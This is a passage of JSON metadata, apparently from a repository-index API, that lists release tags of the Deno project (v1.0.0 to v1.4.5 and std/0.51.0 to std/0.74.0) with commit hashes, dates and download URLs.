/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F